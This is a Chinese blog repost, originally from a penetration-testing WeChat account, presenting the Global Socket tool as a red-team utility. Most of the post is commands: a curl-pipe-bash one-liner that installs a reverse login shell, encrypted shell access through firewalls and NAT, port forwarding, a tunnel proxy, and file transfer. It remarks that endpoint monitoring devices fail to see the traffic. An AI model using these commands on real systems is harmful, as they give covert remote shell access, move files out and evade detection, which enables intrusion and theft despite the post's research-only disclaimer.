技术之红蓝运维管理工具 | Global Socket

admin 2024年3月19日16:18:42评论41 views字数 806阅读2分41秒阅读模式

介绍

https://www.gsocket.io/

使用单个命令(完全自动化)部署反向登录shell,并远程访问加密后的shell。
Global Socket允许不同专用网络上的两个工作站相互通信。

某组织说

This must be the quickest way to access a system —— anonymous

使用以下三个命令之一来安装、卸载和访问 :

安装

bash -c "$(curl -fsSL https://gsocket.io/x)"

技术之红蓝运维管理工具 | Global Socket

卸载

GS_UNDO=1 bash -c "$(curl -fsSL https://gsocket.io/x)"

技术之红蓝运维管理工具 | Global Socket

访问

gs-netcat -s "ExampleSecretChangeMe" -i
S="ExampleSecretChangeMe" bash -c "$(curl -fsSL https://gsocket.io/x)"

技术之红蓝运维管理工具 | Global Socket

高阶玩法

https://github.com/hackerschoice/gsocket/

透过防火墙和NAT访问

gs-netcat -l -i

技术之红蓝运维管理工具 | Global Socket

gs-netcat -i -s AABBCCDDEEFFGG

技术之红蓝运维管理工具 | Global Socket

多人协同

技术之红蓝运维管理工具 | Global Socket

端口转发

client

gs-netcat -l -d 127.0.0.1 -p 22

server

gs-netcat -p 2222

技术之红蓝运维管理工具 | Global Socket

建立连接

nc -nv 127.0.0.1 2222

技术之红蓝运维管理工具 | Global Socket

技术之红蓝运维管理工具 | Global Socket

隧道代理

client

gs-netcat -l -S

技术之红蓝运维管理工具 | Global Socket

server

gs-netcat -p 8848

技术之红蓝运维管理工具 | Global Socket

技术之红蓝运维管理工具 | Global Socket

综合来说还比较稳定

文件传输

先生成两个文件一个包含123一个包含ABC然后用zip压缩成test.zip

技术之红蓝运维管理工具 | Global Socket

client

echo "FILETRANSFER"|gs-netcat -l -r >test.zip

技术之红蓝运维管理工具 | Global Socket

server

echo "FILETRANSFER"|gs-netcat <test.zip

技术之红蓝运维管理工具 | Global Socket

某某某终端监测设备监测不到流量)更多用法请自行研究,懂得都懂


原文始发于微信公众号(渗透安全团队):技术之红蓝运维管理工具 | Global Socket

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月19日16:18:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   技术之红蓝运维管理工具 | Global Sockethttps://cn-sec.com/archives/2580836.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息